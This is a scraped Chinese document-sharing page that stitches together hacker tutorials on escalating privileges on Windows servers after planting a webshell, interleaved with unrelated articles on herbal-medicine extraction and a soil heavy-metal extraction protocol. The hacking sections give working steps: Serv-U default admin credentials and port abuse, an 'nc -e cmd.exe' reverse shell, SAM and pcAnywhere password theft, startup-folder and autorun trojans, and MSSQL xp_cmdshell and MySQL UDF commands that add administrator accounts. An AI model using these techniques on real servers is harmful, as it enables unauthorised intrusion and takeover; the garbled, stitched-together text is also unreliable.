服务器 提权方法大全

服务器 提权方法大全
服务器 提权方法大全

现在可以说网络管理员对服务器的设置是越来越BT,但BT的同时,也有黑客朋友们对服务器的不断的测试,在测试中往往获取最低的guest权限是简单的,像我们在入侵网站过程中,获取webshell是简单的,但是当由webshell的guest权限向system权限提升时却往往是止步不前。所以我有想写这样一篇文章的想法,但是在思考的过程中,又不得不承认,方法是不断的探索中出来的,方法更是有常规的也有另辟蹊径的。下面就做一些简单的介绍,对提权的方法进行一些介绍,同时也希望在更多朋友的不断回复中能够丰富我们的方法。

首先要说明的是,过早的一些漏洞我们就不再多说了,只说一些现在可以见到的吧。还有就是本文的题目是webshell下的服务器提权方法。

下面我们就进入主题,对webshell的提权方法!

首先我们要明确的是,提权一般是依靠主机所开通的服务,利用服务存在的漏洞和管理员设置的疏忽进行提权的,不过也不排除一些SB的管理员对服务器设置的似乎没有"穿衣服".下面就是针对一些常见的服务进行的提权方法。

在获取webshell后,我们常见的是看一下系统的服务,查看服务可以通过利用扫描器对服务器ip进行扫描,或是在webshell中有执行dos命令时查看net start来查看主机所开放的服务。首先我们说一下从简单的开始说起:

1。pcanywhere的提权方法

pcanywhere软件我想大家都了解,为什么将它放在首位就是因为读取密码后直接连接就可以了,如果对方主机在开通了pcanywhere的服务端的话,我们看能否跳转到这个目录C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\,如果行那就最好了,直接下载它的CIF文件,然后使用pcanywhere的密码读取器得到pcAnywhere密码,然后使用pcanywhere登陆即可!接下来就是可视化操作了。

2。Serv-U提权方法

Serv-u可以说是网络上比较火的一款FTP服务器软件,有许多像我这样的小黑们都是看系统服务中是否有Serv-u的系统进程来进行提权的。Serv-u的提权方法针对不同的版本也有不同的方法,这里我们就列举一二,可能不是很全,但在其他网友的回复中能够不断的补充吧!

a.serv-U本地提权:serv-U本地提权一般是利用溢出程序对serv-u的设置上的缺陷进行添加超级账户的功效。例如Xiaolu写的serv-u.exe就是利用sevr-u的默认管理端口,管理员账号和密码进行提权的,默认本地管理端口是:43958,默认管理员:LocalAdministrator,默认密码:#l@$ak#.lk;0@P,这是集成在Serv-u内部的,可以以Guest权限来进行连接,对Serv-u 进行管理,利用本地提权的关键就是寻找服务器文件目录中的everyone权限目录,下面我给大家列举些常见的everyone权限目录:

c:\winnt\system32\inetsrv\data\

是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行

c:\prel

C:\Program Files\Java Web Start\

c:\Documents and Settings\

C:\Documents and Settings\All Users\Documents\

很多时候data目录不行,试试这个很多主机都是erveryone 完全控制!

C:\Program Files\Microsoft SQL Server\

c:\Temp\

c:\mysql\(如果服务器支持PHP)

c:\PHP(如果服务器支持PHP)

上面一些目录就是常见的,不过也不排除一些特殊的,像江民的kv2004对文件夹的权限设置就不是很严格的。

不过针对本地提权是可以防范的,下面是我在xiaolu的文章中节选的:

防止办法和对策:

一般防止方法:设置目录权限,通过去掉Web目录iusr用户的执行权限来防止使用Webshell 来运行Exp程序。

对策:这种方法有一定的局限性,需要设置的目录很多,不能有一点疏漏,比如我就发现很多虚拟主机在C:\Documents and Settings\All Users\ Documents目录以及下边几个子目录Documents没有设置权限,导致可以在这个目录上传并运行Exp,这种目录还有x:\php,x:\perl 等,因为这种目录都是everyone完全控制的。有些主机还支持php,pl,aspx等,这简直就是服务器的Serv-U灾难,^_^,运行程序更加方便。

高级一点的防止办法:修改Serv-u管理端口,用Ultraedit打开ServUDaemon.exe查找B6AB(43958的16进制),替换成自己定义的端口比如3930(12345),打开ServUAdmin.exe 找到最后一个B6AB替换成3930(12345),启动Serv-u,现在本地管理端口就成了12345了:TCP 127.0.0.1:12345 0.0.0.0:0 LISTENING

对策:对付这种也很简单,netstat –an,就能看到端口了,有人说netstat无法运行,其实你再上传个netstat.exe到可执行目录运行就ok了,然后修改一下Exp编译,上传运行就好了,我修改了一个可以自定义端口的Exp,运行格式:

USAGE: serv-u.exe port "command"

Example: serv-u.exe 43958 "net user xl xiaoxue /add"

更高级的防止办法:修改管理员名和密码,用Ultraedit打开ServUDaemon.exe查找Ascii:LocalAdministrator,和#l@$ak#.lk;0@P,修改成等长度的其它字符就可以了,ServUAdmin.exe 也一样处理。

对策:这下默认的管理员连接不上了,还有办法么?嘿嘿,有的管理员安装Serv-u都是使用默认目录C:\Program Files\Serv-U安装,这个目录虽然不能写,也不能修改,但是默认iusr 是可以读的,我们可以用webshell来下载ServUDaemon.exe,用Ultraedit打开分析一下,Serv-U 的帐号密码就到手了,修改Exp编译上传运行,我们又胜利了。

终极防御:

a.设置好目录权限,不要疏忽大意;

b.Serv-U最好不要使用默认安装路径,设置Serv-U目录的权限,只有管理员才能访问;

c.用我介绍的办法修改Serv-U的默认管理员名字和密码,喜欢的话端口也可以改掉。

d.serv-U管理端口定向转发法:这里需要使用的工具是FPip

e.exe

我们要知道Serv-u默认本地管理端口是:43958,这个是只允许本地ip127.0.0.1进行登陆和管理的,那么我们就想能不能通过端口转向来远程管理呢?所以我们用到FPipe.exe,首先是将FPipe.exe上传至服务器中,然后再cmd下执行

Fpipe.exe -v -l 12345-r 43958 127.0.0.1

这里要说明的是,这段字符的意思是当访问12345端口时就会自动转向43958端口,也就是serv-u的管理端口

所以我们在本地安装一个Serv-u,

新建一个服务器,填入对方IP,

user:

LocalAdministrator

pass:

#l@$ak#.lk;0@P

连接上后你就可以管理他的Serv-u了,剩下的操作就是执行上面提到的方法了!

===================================================

Serv-U的方法我就总结出这几个来,可能还有其他的方法我没有看到吧

不过个人认为关键还是本地溢出漏洞的应用要比较多一些,所以网上也常常出现serv-u的本机溢出程序

不同版本的更是层出不穷,前一段时间针对serv-u6.0.2的修改了默认管理员账号和密码的相关文章还请大家参照校园黑客联盟的小鱼修炼中的文章。

Serv-U的提权文章就暂时先总结到这里,有更好的方法还请大家回复!

3.Autorun方法:这种方法也可以说是比较古老的方法,最初应该是从光盘自动播放中寻找到的灵感吧?不进行细说,给出格式即可

制作一个Autoruan.inf文件.内容如下

[AutoRun]

open=bear.exe

bear.exe为木马程序,与autorun.inf放在同一目录下!

4。SAM破解方法:进入C:\WINNT\system32\config\ 下载他的SAM文件用lc等破解工具破解。

5。相关脚本提权方法:前面的serv-u的ftp提权中提过的vbs这里再说下.进入c:\Documents and Settings\All Users\「开始」菜单\程序\启动写入bat或vbs文件。这种方法也是属于守株待兔类的,只有在对方主机重起以后才可以达到目的。

6。NC的反弹提权:这里就要说NC的相关用法了,如果在对方服务器中有足够的权限执行nc的话就好了,把它反弹到自己的电脑上,你就可以进行相关操作了!瑞士军刀具体方法不多说,给出格式,如下:

server:nc -e cmd.exe ip 1234

client: nc -l -p 1234

7。conn等asp文件中泄漏SQL帐户密码方法:这种方法说起来应该算是比较侥幸的方法。曾经马俊和我说过一次,原来没有太在意,现在还真的感觉有些好用了,找到账号密码和数据库名在对方没有删除xp_cmdshell条件下用sql连接工具连接即可,连接上后就可以输入你想要的CMD命令了。

8。VNC的相关提权:VNC也是一个类似pcanywhere的远程管理软件,在linux应用广泛,曾经在看台湾的一些服务器中有很多使用VNC的,方法也是我在网络中学到的,不过在应用中就成功过一次,比较郁闷!方法就转载一下吧,网址:https://www.360docs.net/doc/b21904772.html,/Article/HTML/14184.html

还有要补充的就是vnc是可以反向连接的,这个方法我没有试过,只是曾经看影子做过一个视频动画。

9。desktop.ini与Folder.htt方法。(此方法是在网络看到的)方法如下:首先建立一个文件夹,进入,在空白处点右键,选择“自定义文件夹”一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为Folder

setting的文件架与desktop.ini的文件,如果看不到,就把显示所有文件给选上,然后我们在Folder setting目录下找到Folder.htt文件,记事本打开,在任意地方加入以下代码:

ID=“RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=“木马名”> 然后你将你的木马文件放在Folder setting目录下,把此目录与desktop.ini一起上传到对方任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的木马,此方法也属于类似autorun的守株待兔方法。

10。替换服务提权:我认为比较复杂,不过有些时候也实用,首先是看服务进程,在看我们是否有执行命令的权限,这里要用到的命令是rename,相关用法:

C:\>rename /?

重命名文件。

RENAME [drive:][path]filename1 filename2.

REN [drive:][path]filename1 filename2.

例如替换c:\kv2004\kv.exe的进程

rename c:\kv2004\kv.exe bear.exe

然后再将我们的本地木马文件命名为kv.exe上传到c:\kv2004\目录下,等待对方重新起动机算机即可!

最全的WEBSHELL提权大大全

WEBSHELL权限提升技巧 c: d: e:..... C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere 密码,登陆 c:\Program Files\serv-u\ C:\WINNT\system32\config\ 下它的SAM,破解密码 c:\winnt\system32\inetsrv\data\ 是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行 c:\prel C:\Program Files\Java Web Start\ c:\Documents and Settings\ C:\Documents and Settings\All Users\ c:\winnt\system32\inetsrv\data\ c:\Program Files\ c:\Program Files\serv-u\ C:\Program Files\Microsoft SQL Server\ c:\Temp\ c:\mysql\(如果服务器支持PHP) c:\PHP(如果服务器支持PHP) 运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限 还可以用这段代码试提升,好象不是很理想的 如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。 根目录下隐藏autorun.inf C:\PROGRAM FILES\KV2004\ 绑 D:\PROGRAM FILES\RISING\RAV\ C:\Program Files\Real\RealServer\ rar Folder.htt与desktop.ini 将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下 replace 替换法捆绑 脚本编写一个启动/关机脚本重起 删SAM 错 CAcls命令 FlashFXP文件夹Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak Ring的权限提升21大法! 以下全部是本人提权时候的总结很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过

中药提取方法

综述中药提取方法 摘要以中药提取方法的本质与影响提取作业的因素为理据,分析国内中药厂提取方法 关键词中药提取方法 1前沿 近年来有关中药提取方法的论述有很多,然而有效成分的提取率仍然就是现今国内中药制药工业现代化的瓶颈。尽管近年来国内在中药提取生产中推出了一些新工艺,如超声场强化提取、微波提取、超临界流体提取等,但当下的主流仍就是浸提技术。浸提技术就是应用溶剂提取固体原料中某一或某类成分的提取分离操作,又称固液萃取。目前在中药生产过程中,常用的中药浸提方法有煎煮法、浸渍法、渗漉法、回流法、水蒸气蒸馏法等。 面对众多中药提取方法如何抉择就是一个复杂的问题,因为它牵涉到生产设备与生产条件等许多因素。加上如今中药提取的规模较大,尤其考虑到连续生产,即使在实验中取得成果,在实际情况下还要经过长时间的实践检验。还有前面提到过的提取新工艺,其提取物往往就是化学结构明确的物质,与传统中药生产完全就是两回事,所以生产传统中药的厂家下不了决心去尝试新工艺,生产者情愿随大流,以避免风险。 提取方法的不同,提取等量有效成分所需原料与能源也

不尽相同,资源与能源对世界经济与人类生存环境的影响越来越被重视。可持续发展经济与资源节约型社会的概念已经被全世界广泛认同,中国也不例外。在市场竞争激烈异常的今天,生产成本的控制就就是企业的生命,而对世界能源价格上涨的现实,生产者应该节约每一滴水,每一度电。中药生产厂家必须努力挑选出最好的中药提取方法,改变目前中药提取效率低、高能耗、高污染所造成的负面影响。 2选择原则 与所有的工程项目一样,选择中药提取方法必要考虑的条件也就是:被处理物料的性质、数量,产品的价值操作人员的技术水平,现实的设备安装场地,生产成本的控制,投资的预算。所追求的目标也就是最高的投资回报率,最低的能耗,最简单的操作,最理想的提取率。降低生产成本,提高产品质量,从而提升本企业的市场竞争力。舍此不会有 良好的后果。 3中药提取本质 中药提取本质上就是一种固液萃取作业,任何化工原理教科书与化工手册对固液萃取的机理都有详尽的阐明。为了便于分析国内中药厂现有提取装置的状况,有必要将其与中药提取有关的结论摘录于此。

1433口令提权详细过程及错误修复

前段时间我朋友给我一个sopo的软件,说是扫1433口令的,而且猜解速度很快,我就找个服务器试了试,确实不错能扫到一些比较强点的口令。所以这段时间就玩了一下1433错误的恢复和提权。(有人可能会说了,这有啥好研究的,sa的权限直接加用户到超管不就成了吗。其实在sa权限下还是有很多的问题的大家可以捡有用的看没用的就略过吧) 下面来说sa下执行命令错误的几种情况: 1、无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。原因126(找不到指定模块。) 这种情况比较常见的,修复起来说简单也简单,但是有条件的。这种情况要是能列出目录(用sqltools v2.0就有列目录功能)恭喜你这个有80%的情况能修复了,如果能列目录,那么只要找到xplog70.dll的路径执行以下命令就可以了。 第一步 exec sp_dropextendedproc 'xp_cmdshell' (这个命令就是删除原有的cmdshell,因为已经出错了) 第二步 dbcc addextendedproc (“xp_cmdshell”,“c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll”) ;EXEC sp_configure 'show advanced options', 0 – 当然这是sql命令,用查询分析器执行。第二步里的c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll就是xplog70.dll的路径,这个路径是比较常见的,如果c盘没有可以找找其他盘符。 2、无法在库xpweb70.dll 中找到函数xp_cmdshell。原因:127(找不到指定的程序。) 其实这个跟上面的126是一样的就是cmdshell出错了只要找到备份的xplog70.dll按照上面的方法就能修复了。 3、未能找到存储过程‘masterxpcmdshell' 这种情况我看到网上的方法是: 第一步先删除: drop procedure sp_addextendedproc

1433提权全教程

1433端口提权的过程 随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=(https://www.360docs.net/doc/b21904772.html,)广告完毕。 把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录 显示错误信息: Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的 这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了, 当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权, 但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上

传无法成功,这条路走不通了, 这时就考虑用到工具的文件管理功能了 看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看 sql的安装路径里的xplog70.dll文件是否存在 看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西

详解黑客入侵Web服务器的常用八种方式

详解黑客入侵Web服务器的常用八种方式 发布时间:2012-6-13 14:21:37 被阅览数:次来源:厦门凌众科技有限公司onclick=tagshow(event) href="tag.php?name=%B7%FE%CE%F1%C6%F7">服务器一般都很容易成为黑客们的入侵对象,本文向广大的onclick=tagshow(event) href="tag.php?name=%CD%F8%B9%DC">网管员们介绍了黑客们常用 的八种入侵onclick=tagshow(event) href="tag.php?name=%B9%A5%BB%F7">攻击方式,供大家参考! 一、WEBonclick=tagshow(event) href="tag.php?name=%B7%FE%CE%F1">服务器面临威胁 在了解WEB服务器的安全状况之前,首先要让大家了解网站安全的另一面——黑客攻击。97至98年互联网开始在onclick=tagshow(event) href="tag.php?name=%D6%D0%B9%FA">中国兴起之时,黑客就已经诞生了,在98年印尼排华事件中,中国黑客对印尼ZF网站的打击行动通过媒体的渲染,让黑客一词进入了广大中国网民的眼帘。随着几次黑客大战的爆发以及媒体对黑客的渲染,让更多人加入了黑客这个队伍。那么黑客都是通过怎样的onclick=tagshow(event) href="tag.php?name=%BC%BC%CA%F5">技术手段实施攻击的呢?97年到2002年以来,除了比较有名的UNICODE漏洞之外,黑客们大部分都是利用onclick=tagshow(event) href="tag.php?name=%CF%B5%CD%B3">系统的各种溢出漏洞来实施 入侵,包括像ipc共享空连接漏洞,ida/idq,printer漏洞,rpc漏洞等等。2003年,中国互联网开始从01年的互联网寒冬逐渐走向复苏,盛大、分众传媒、空中网等一系列ITonclick=tagshow(event) href="tag.php?name=%C6%F3%D2%B5">企业分别在纳斯达克上市成功更进一步激起了更多IT从业人员开始开设网站和成立IT公司,梦想有一日能上纳斯达克拿onclick=tagshow(event) href="tag.php?name=%C3%C0%B9%FA">美国股民的钱。网站数量的激增以及大家对onclick=tagshow(event) href="tag.php?name=%CD%F8%C2%E7">网络安全的轻视,导致通过WEB的各种漏洞来进行入侵的事件越来越多。SQL注入漏洞随着黑客onclick=tagshow(event) href="tag.php?name=%B8%DF%CA%D6">高手 们一次又一次地使用在拿国内外onclick=tagshow(event) href="tag.php?name=%D3%CE%CF%B7">游戏onclick=tagshow(event)

授渔之1433提权全教程

授渔之<一次1433端口提权的过程> 随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=(https://www.360docs.net/doc/b21904772.html,)广告完毕。 把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录 显示错误信息: Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的 这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了, 当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权, 但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上

传无法成功,这条路走不通了, 这时就考虑用到工具的文件管理功能了 看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看 sql的安装路径里的xplog70.dll文件是否存在 看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西

关于mysql提权方法总结

关于mysql提权方法总结 mysql是一种开放源代码的关系型数据库管理系统(rdbms),mysql数据库系统使用 最常用的数据库管理语言--结构化查询语言(sql)进行数据库管理。那么对于mysql提权的方法,站长们是否了解呢?专职优化、域名注册、网站空间、虚拟主机、服务器托管、vps 主机、服务器租用的中国信息港在这里为你做深入探讨! mysql提权总结方法四则 一 UDF提权 这类提权方法我想大家已经知道了,我大致写一下,具体语句如下: 1 create function cmdshell returns string soname 'udf.dll' 2 select cmdshell('net user iis_user 123!@#abcABC /add'); 3 select cmdshell('net localgroup administrators iis_user /add'); 4 select cmdshell('regedit /s d:\web\3389.reg'); 5 drop function cmdshell; 6 select cmdshell('netstat -an'); 二 VBS启动项提权 1 create table a (cmd text); 2 insert into a values ("set wshshell=createobject (""wscript.shell"") " ); 3 insert into a values ("a=wshshell.run (""cmd.exe /c net user iis_user 123!@#abcABC /add"",0) " ); 4 insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators iis_user /add"",0) " ); 5 select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动 \\a.vbs"; 先在webshell里连接上数据库,建立表,将VBS写入表里,然后导入启动项, 如果UDF提权不行的话也可以尝试下这个方法,前提是要有ROOT权限,后面有个,0表示不弹出CMD窗口,安静的运行。 还可以这样写: 1 create table a (cmd BLOB); 2 insert into a values (CONVERT(木马的 16进制代码,CHAR)); 3 select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe' 4 drop table a; 执行前3条语句,就可以将木马写进启动里了,前提是木马一定要是16进制,还有就是路径要是\\,因为windows会自动过滤掉一个\

【法客周年庆】跟着黑客走吃喝全都有,提权 (二)

目录 1、进shell检查权限 (1) 2、扫端口 (1) 3、43958 开了 (2) 4、1433开了得到dbo权限 (2) 5、找到Serv-U目录无法访问 (3) 6、尝试mysql提权 (3) 7、尝试su提权 (4) 8、SU提权 (5) 9、总结 (5) 1、进shell检查权限 首先这个是看到坛子里面的一个求助提权贴提权的,以前在hake发过,但没这么详细 溜达进shell看了下子。。 aspx支持的完好,不过权限还是比较低的。。 IISSPY可以完美跨目录,那么提权还是有大大的希望的。。 2、扫端口 127.0.0.1 : 21 ................................. Open 127.0.0.1 : 25 ................................. Open 127.0.0.1 : 80 ................................. Open 127.0.0.1 : 110 ................................. Open 127.0.0.1 : 1433 ................................. Open 127.0.0.1 : 1723 ................................. Close 127.0.0.1 : 3306 ................................. Open 127.0.0.1 : 3389 ................................. Open 127.0.0.1 : 4899 ................................. Close 127.0.0.1 : 5631 ................................. Close 127.0.0.1 : 43958 ................................. Open 127.0.0.1 : 65500 ................................. Close

获得网站WEBSHELL权限的截图0

获得网站WEBSHELL权限 一、学习目标:在得到了管理员帐号的情况下,进入网站的管理员后台,以备份数据库得到WEBSEHLL。 二、知识要点:在入侵网站之前,信息搜集是第一步,任何情况的搜集,当情况搜集有初步成果之后,应该首先试图获得管理员的帐号和密码,然后找出网站的后台(看管理员在后台的什么地方),对于现成的整站系统而言,通常后台是固定的,只要搞到网站就能以管理员的帐号进入。进了后台,就有了能力对网站进行操作,我们就有了很大的把握获得的一个WEBSEHLL。所谓WEBSEHLL,也就是一个脚本,这个脚本,具有可以管理WEB、修改主页内容的权限,如果要修改别人的主页,一般都需要这个权限(上传漏洞要得到的也是这个权限)。它可对网站的任何文件进行编辑,移动,复制,删除。如果某个服务器权限设置得不好,那么通过webshell可以得到该服务器的最高权限----即可以得到的是整个网站的操作权限,并且是进一步渗透获得主机权限的立脚点。 在进入管理后台后,获得WEBSHELL的首选方法是通过"备份数据库"的方法上传一个扩展名改成GIF的ASP木马,(之所以要把ASP的木马护展名由ASP改为GIF,是因为一般网站都有检测护展名,当检测到护展名为ASP时就不会允许上传),上传之后,用备份数据库的办法,把GIF护展名,备份成为ASP护展名,然后连接备份后的ASP地址,就能打开你上传的ASP木马,一个WEBSEHLL就到手了。具体方法为在备份数据库地址里输入你上传的GIF文件的相对地址,在恢复地址里输入你要生成的ASP地文件的路径和文件名,然后恢复数据库即可。 三、实验步骤 1、IE浏览器中输入https://www.360docs.net/doc/b21904772.html,/bbsxp1(之前已经通过某方法得到网站后台管理员的用户名、口令)。 (1)以管理员身份登录网站前台,如图1。 图1 (2)在图2界面中进入ACCESS数据库管理,并在图3界面中输入后台管理员密码完成登录。

改进的BCR连续提取法详细实验流程

改进的BCR重金属形态提取方法 试剂配制:所用的药品必须是分析纯以上。 溶液A 0.11mol/L冰乙酸(HOAc,0.11mol/L): 用移液枪吸取6.32 mL冰醋酸到1L的容量瓶中,再用去离子水定容。获得溶液A。(12.64 mL冰醋酸到2L的容量瓶中) 溶液B 0.5 mol/L盐酸羟胺(NH2OH·HCl,0.5 mol/L):溶解34.75g的NH2OH·HCl到400mL的去离子水中。转移溶液至1L容量瓶中,再加入25mL的2 mol/LHNO3(或3.125 mL浓HNO3)到1L容量瓶中,最后用去离子水定容。该溶液要当天使用当天配。(溶解69.49g NH2OH?HCl,加入6.25mL浓HNO3到2L的容量瓶中) 溶液C30%过氧化氢(H2O2,300mg/g,8.8 mol/L):使用由厂家提供的H2O2(用硝酸调节至pH稳定在2-3)即可。 溶液D 1 mol/L乙酸铵(NH4OAc,1 mol/L): 溶解77.08g的NH4OAc到800mL的去离子水中。再用一定浓度的HNO3调节pH到2.0±0.1,最后用去离子水定容。(154.16g-2L)注意事项: 1.所有用来盛放样品或反应物的容器及配置溶液的容量瓶和烧杯都 要用20% HNO3浸泡过夜,然后用去离子水清洗3遍以上。注意每批样品至少设置2个空白及两个标准品(BCR法)GBW07437进行质量控制。 2.第3步中每次添加完过氧化氢溶液或加热时,盖上盖子但不要拧 紧,前15min要格外小心,避免大量气体产生溢出损失样品。

改进的BCR连续提取法包含四个步骤,其详细流程如下: 第1步(弱酸提取态):用精确度0.0001g的分析天平准确称取过100目筛的风干土壤样品0.5000-0.5010g放入50ml泡酸清洗过的离心管中,加入20mL 0.11mol/L 的CH3COOH溶液,(在添加浸提液和开始振荡这段时间不要耽搁太久)22±5℃下30±10 rpm振荡16小时,静置3-5分钟后轻摇离心管使管壁的所有样品均进入溶液中,然后以4000rpm的转速离心15min。将上清液移入50mL泡酸清洗过的聚乙烯瓶中,于4℃条件下保存、待测。往残余物中加入15mL去离子水,振荡15分钟,静置3-5分钟后轻摇离心管使管壁的所有样品均进入溶液中,以4000rpm的转速离心15min,小心弃去上清液。 第2步(可还原态):向上一步提取后的剩余沉积物样品中加入现配的20mL 0.5mol/L的(NH2OH·HCl)盐酸羟胺溶液(该溶液要现配现用,2mol/L HNO3酸化,pH 1.5),22±5℃下振荡16小时,静置3-5分钟后轻摇离心管使管壁的所有样品均进入溶液中,然后以4000rpm的转速离心15min。将上清液移入50ml 泡酸清洗过的聚乙烯瓶中,于4℃条件下保存、待测。往残余物中加入15mL去离子水,振荡15分钟,静置3-5分钟后轻摇离心管使管壁的所有样品均进入溶液中,以4000rpm的转速离心15min,小心弃去上清液。 第3 步(可氧化态):分步向上一步提取后的剩余样品中加入5mL 8.8mol/ml的双氧水原液(pH值2-3),盖上盖子但不要拧紧,利用振荡器间歇5min摇动离心管,在室温下消化1小时,然后将其移至水浴锅中,于85±2℃下消化1小时(前半小时要间歇性的进行手摇振荡以防止样品溢出),打开离心管盖,继续在85±2℃下加热至管内溶液剩余3mL以下。再加入5mL双氧水原液,在85±2℃下继续加热至溶液近干(1mL以下)。待离心管冷却后,加入20mL 1mol/L pH 值为2.0的乙酸铵溶液(浓HNO3酸化pH 2.0),22±5℃下振荡16小时,静置3-5分钟后轻摇离心管使管壁的所有样品均进入溶液中,然后以4000rpm的转速离心15min。将上清液移入50ml 泡酸清洗过的聚乙烯瓶中,于4℃条件下保存、待测。往残余物中加入15mL去离子水,振荡15分钟,静置3-5分钟后轻摇离心管使管壁的所有样品均进入溶液中,以4000rpm的转速离心15min,小心弃去上清液。 第4步(残渣态):借助漩涡震荡仪用6mL浓HNO3分两次(每次3mL)洗出离心管中剩余的样品到聚四氟乙烯消煮管,再先后用2mL HF和3mL HCl将离心管剩余残渣洗涤后转移至消煮管中,用微波消解仪对土壤进行消解后,赶酸至消煮管中剩余液体体积如黄豆大小,然后借助旋涡震荡仪用1%HNO3洗涤消煮管,液体转移至聚乙烯瓶定容到25mL。 第5步(总量):准确称取过100目筛的风干土壤样品0.500g,加入6mL HNO3 2mLHF和3mL HCl,用微波消解仪对土壤进行消解后,赶酸至消煮管中剩余液体体积如黄豆大小,然后借助旋涡震荡仪用1%HNO3洗涤消煮管,液体转移至聚乙烯瓶定容到25mL。

九种经典的Webshell提权

说到花了九牛二虎的力气获得了一个webshell, 当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~ 嘻嘻~~好跟我来,看看有什么可以利用的来提升权限 第一 如果服务器上有装了pcanywhere服务端,管理员为了管理方便 也给了我们方便,到系统盘的Documents and Settings/All Us ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地 破解就使用pcanywhere连接就ok了 第二 有很多小黑问我这么把webshell的iis user权限提升 一般服务器的管理都是本机设计完毕然后上传到空间里, 那么就会用到ftp,服务器使用最多的就是servu 那么我们就利用servu来提升权限 通过servu提升权限需要servu安装目录可写~ 好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载下来,然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖,启动servu添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限 然后去servu安装目录里把ServUDaemon.ini更换服务器上的。 用我新建的用户和密码连接~ 好的,还是连上了 ftp ftp>open ip Connected to ip. 220 Serv-U FTP Server v5.0.0.4 for WinSock ready... User (ip:(none)): id //刚才添加的用户 331 User name okay, please send complete E-mail address as password. Password:password //密码 230 User logged in, proceed. ftp> cd winnt //进入win2k的winnt目录 250 Directory changed to /WINNT ftp>cd system32 //进入system32目录 250 Directory changed to /WINNT/system32 ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe 文件加用户。 如果提示没有权限,那我们就 把后门(server.exe)传他system32目录 然后写一个VBs教本 set wshshell=createobject ("wscript.shell") a=wshshell.run ("cmd.exe /c net user user pass /add",0) b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0) b=wshshell.run ("cmd.exe /c server.exe",0)

浸出法制取大豆油

